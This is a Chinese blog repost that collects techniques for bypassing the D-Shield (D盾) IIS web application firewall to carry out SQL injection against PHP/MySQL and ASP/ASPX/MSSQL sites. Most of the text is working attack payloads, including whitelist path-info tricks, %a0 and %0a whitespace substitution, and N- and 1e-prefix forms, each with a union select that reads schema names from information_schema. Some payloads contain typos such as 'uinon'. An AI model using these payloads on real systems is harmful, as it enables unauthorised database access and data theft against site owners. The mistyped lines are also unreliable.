我是靠谱客的博主 等待花瓣,最近开发中收集的这篇文章主要介绍Bypass之D盾IIS防火墙SQL注入防御,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

并非原创,标记原创只是为了涨积分,下面有原创大佬的原帖连接。

一、针对 IIS+PHP+MYSQL配置的D盾防火墙绕过

首先D盾大家在做渗透测试的时候多多少少应该都有遇到过
就长这个样子,他会在你觉得发现漏洞的时候出现。。。。总之很烦人

绕过姿势一、白名单
PHP中的PHP_INFO问题,简单来说就是  http://x.x.x.x./3.php?id=1 等价于 http://x.x.x.x/3.php/xxxx?id=1 
从白名单中随便挑个地址加在后面,可成功bypass,http://10.9.10.206/3.php/ admin.php?id=1 union select 1,2,schema_name from information_schema.schemata 这里的admin.php是白名单中的一个文件名。经原创大佬测试,GET,POST.COOKIE均有效,可以bypass

绕过姿势二、空白字符
Mysql中可以利用的空白符有:%09,%0a,%0b,%0c,%0d,%20,%a0;   经大佬测试,基本上针对Mssql的[0x01-0x20]都被处理了,但维度Mysql中还有一个 %a0可以利用,可以看打%a0与select合体,无法识别,从而绕过。
例如 :       
?id=1 union%a0select 1,2,schema_name from information_schema.schemata

绕过姿势三、N形式
主要思考问题,如何绕过union select 以及select from ? 如果说上一个姿势是Union和select之间的位置探索,那么是否可以考虑在union前面进行检测呢?为此在参数与union的位置,经测试,发现N可以绕过union select检测,同样的方式可以绕过select from的检测  id= Nuinon(select 1,2,schema_name from information_schema.schemata)


二、针对IIS+ASP/ASPX+MSSQL环境

绕过姿势一、白名单
ASP:不支持,找不到路径,而且D盾进制执行带非法字符或特殊目录的脚本(/1.asp/x),彻底没戏了
/admin.php/../1.asp?id=1 and 1=1 拦截  /1.asp?b=admin.php&id=1 and 1=1拦截,可见D盾会识别到文件的位置,并不只是检测URL存在白名单那么简单了
ASPX:与PHP类似 /1.aspx/admin.php?id union select '1','2','schema_name from information_schema.schemata'   即可成功绕过bypass

绕过姿势二、空白字符
ASPX+MSSQL: %a0+%0a配合,可以绕过union select 的检测 ??id=1union%a0%0aselect '1','2','schema_name from information_schema.schemata' 

绕过姿势三、1E形式
MSSQL属于强类型,这边的绕过是有限制。 from前一位显示为数字类型,才能用 1efrom绕过 select from
只与数据库有关,与语言无关,ASP和ASPX都可以Bypass
id=1 uinon select '1','2','schema_name from information_schema.schemata' 

最后说明一下这些东西都不是我原创的,我只是总结了大佬的绕过姿势,希望更多的人能学习到
如果大家想学习更多绕过姿势,可以关注大佬的微信公众号bypass


最后

以上就是等待花瓣为你收集整理的Bypass之D盾IIS防火墙SQL注入防御的全部内容,希望文章能够帮你解决Bypass之D盾IIS防火墙SQL注入防御所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(59)

评论列表共有 0 条评论

立即
投稿
返回
顶部